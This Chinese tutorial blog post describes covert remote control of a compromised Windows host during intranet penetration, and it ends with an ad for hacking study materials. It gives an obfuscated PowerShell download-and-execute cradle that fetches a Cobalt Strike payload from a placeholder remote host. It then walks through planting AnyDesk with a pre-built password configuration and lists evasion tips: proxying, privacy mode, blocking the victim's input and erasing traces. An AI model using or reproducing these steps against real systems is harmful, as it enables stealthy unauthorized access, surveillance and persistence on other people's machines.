在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。
本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。
首先上线cs
这里我们使用powershell上线,首先我们使用Payload Generator生成一个ps1脚本
然后在目标机器上执行:(使用管理员权限执行)
css
复制代码powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''https://www.xxxx.tk:8443/payload.ps1'')'.Replace('11','adString');IEX ($a+$b)"
可以看到上线成功
下载anydesk
获取到权限以后 ,我们在目标机器上下载anydesk:
php
复制代码powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")
我们看到anydesk已经下载到了目标主机上,这是我们先不急着打开,我们先添加他的配置文件
生成配置文件
如果我们直接打开的话,我们不知道他的id号,也不能通过密码进行登录,更不可能直接修改,这时候我们可以先在本机生成一个配置文件,然后将配置文件拷过去。
所以我们先下载一个anydesk到本地,然后打开它,记住他的id号,例如我的就是802691146
我们为自主访问设置密码在这里随便设置一个密码
然后我们将anydesk彻底关闭,退出的时候选择不安装anydesk
他会自动将配置文件生成在
%appdata%\AnyDesk
,也就是
C:\Users\你的用户名\AppData\Roaming\AnyDesk
我们将这四个文件保存下来,然后上传到目标主机的对应位置, 务必记得保存到别处以后把本机的配置文件删除
上传配置文件并启动anydesk
在这个路径下新建一个名为AnyDesk
的文件夹
然后在此文件夹下上传刚刚保存的四个配置文件
然后启动anydesk
连接测试,提示输入密码
成功连接
注意事项
这里说一下避免踩坑的几个点:
记的在这里一定要把用户名称改成自定义,否则在那边直接会显示你的用户名 \手动狗头
生成配置文件后将配置文件保存后记的删除配置文件,下次你重新启动anydesk的时候会自动生成并自动重新分配一个id
目标主机必须有管理员权限
必要时可以可以设置代理,避免让对方反制自己(由于我是用的是clash,直接代理的本地7890端口)
控制目标机器后可以 关闭目标机器的anydesk ,但实际不会断开连接,且连接结束后会自动结束目标机器的anydesk进程,便于消除痕迹
控制目标机器后记的开启 禁止用户输入 和 启动隐私模式
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,如果你对网络安全入门感兴趣,需要的话可以在下方